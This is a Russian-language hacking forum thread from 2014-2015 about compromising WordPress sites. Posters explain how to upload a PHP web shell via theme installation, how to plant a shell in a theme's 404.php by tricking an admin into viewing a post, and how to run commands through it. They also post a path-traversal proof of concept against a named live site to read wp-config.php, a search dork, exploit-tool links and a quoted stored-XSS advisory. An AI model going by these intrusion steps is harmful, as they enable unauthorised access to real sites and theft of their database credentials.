
20.10.2014, 13:09
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами:
9533780
Репутация:
97
|
|
Сообщение от po3t
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл
Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
domain/wp-content/uploads/shell.php
или
domain/wp-content/uploads/2014/10/shell.php
в 99% случаях заливается.
|
|
|

20.10.2014, 20:13
|
|
Новичок
Регистрация: 10.04.2012
Сообщений: 0
С нами:
7415606
Репутация:
0
|
|
Сообщение от None
попробуй подставить путь,должно открыть окно загрузки плагинов
/wp-admin/update.php?action=upload-plugin
не помогло пишет недостаточно прав
Сообщение от None
Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
domain/wp-content/uploads/shell.php
или
domain/wp-content/uploads/2014/10/shell.php
в 99% случаях заливается.
нету пункта установка тем, могу заливать только медиафайлы
Есть у кого еще идеи?
|
|
|

26.10.2014, 12:24
|
|
Новичок
Регистрация: 29.11.2012
Сообщений: 0
С нами:
7080086
Репутация:
0
|
|
Сообщение от None
Есть у кого еще идеи?
Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код
twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id
|
|
|

03.11.2014, 02:39
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от djumiksc
Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код
twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id
разве там нет anti-csrf хеша ?
|
|
|

20.01.2015, 14:01
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
https://wpvulndb.com/
ежедневное обновление уязвимостей вп
|
|
|

08.02.2015, 10:01
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
https://github.com/dionach/CMSmap
CMSmap сканер уязвимостей для популярных CMS WordPress, Joomla, Drupal.
По сути,аналог WPScan , только можно использовать на Windows + поддержка веб-шелла.
|
|
|

05.03.2015, 14:02
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
https://github.com/joren485/WP-Slimstat-SQLI
скрипт для эксплутации бага WP-Slimstat
http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html
https://github.com/delvelabs/vane GPL форк известного сканера WPScan
|
|
|

18.03.2015, 22:06
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurllugins/mac-dock-gallery/ download
@version:2.7
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"/uploads/mac-dock-gallery/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'albid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Description: File Transfer'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type: application/octet-stream'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Disposition: attachment; filename='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Transfer-Encoding: binary'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Cache-Control: must-revalidate, post-check=0, pre-check=0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: public'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Length: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]ob_clean[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]flush[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
POC:
Сообщение от None
_ttp://rolfeckel.com/blog/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php
PATCH:
https://wordpress.org/plugins/mac-dock-gallery/other_notes/
|
|
|

21.04.2015, 17:23
|
|
Участник форума
Регистрация: 13.10.2010
Сообщений: 148
С нами:
8200406
Репутация:
0
|
|
|
|
|

27.04.2015, 12:54
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
WordPress 4.2 stored XSS
Сообщение от None
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|